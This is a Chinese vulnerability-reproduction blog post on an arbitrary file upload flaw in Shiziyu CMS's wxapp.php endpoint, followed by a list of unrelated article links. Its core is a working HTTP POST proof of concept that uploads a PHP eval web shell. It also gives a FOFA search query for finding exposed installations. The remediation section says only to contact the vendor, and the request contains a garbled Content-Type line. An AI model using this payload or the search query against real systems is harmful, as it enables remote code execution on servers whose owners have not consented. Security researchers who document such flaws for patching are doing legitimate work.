【漏洞复现】狮子鱼CMS文件上传漏洞(wxapp.php)

Nx01 产品简介

        狮子鱼CMS(Content Management System)是一种网站管理系统,它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面,网站所有者可以方便地进行内容的发布、管理和布局。

Nx02 漏洞描述

        狮子鱼CMS wxapp.php文件存在任意文件上传漏洞,攻击者可能利用这个漏洞上传恶意文件并执行恶意代码。

Nx03 产品主页

fofa-query: body="/seller.php?s=/Public/login"

Nx04 漏洞复现

POC:

POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1
Host: {
  {Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs

------WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Disposition: form-data; name="upfile"; filename="test.php"
Content-Type: http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vuln/gif

<?php @eval($_POST['test']);?>
------WebKitFormBoundary8UaANmWAgM4BqBSs--

Nx05 修复建议

建议联系软件厂商进行处理。

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-02-12 21:44:01       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-02-12 21:44:01       101 阅读
  3. 在Django里面运行非项目文件

    2024-02-12 21:44:01       82 阅读
  4. Python语言-面向对象

    2024-02-12 21:44:01       91 阅读

热门阅读

  1. 常见的web前端开发框架:Vue.js

    2024-02-12 21:44:01       55 阅读
  2. 腾讯ieg游戏运营开发蓝鲸一面24.02.02

    2024-02-12 21:44:01       54 阅读
  3. 人工智能在金融领域的革新:挑战与机遇

    2024-02-12 21:44:01       64 阅读
  4. Postgres 和 MySQL 应该怎么选?

    2024-02-12 21:44:01       60 阅读
  5. Redis缓存高可用集群在电商网站中的应用

    2024-02-12 21:44:01       52 阅读
  6. Springboot 2.5.x如何集成Nacos 2.x的配置管理功能?

    2024-02-12 21:44:01       62 阅读
  7. vue监视和深度监视

    2024-02-12 21:44:01       58 阅读
  8. Clickhouse查询语句执行过程

    2024-02-12 21:44:01       60 阅读
  9. 2024.2.11

    2024.2.11

    2024-02-12 21:44:01      53 阅读
  10. PMP-情景模拟学习法-识别时间点

    2024-02-12 21:44:01       50 阅读
  11. C# ICloneable的特点及其用法

    2024-02-12 21:44:01       54 阅读
  12. js文件忽略ESLint语法检查

    2024-02-12 21:44:01       50 阅读
  13. P1013 [NOIP1998 提高组] 进制位

    2024-02-12 21:44:01       64 阅读
  14. Shell之awk

    2024-02-12 21:44:01       63 阅读
  15. 2024春晚刘谦魔术C++实现

    2024-02-12 21:44:01       59 阅读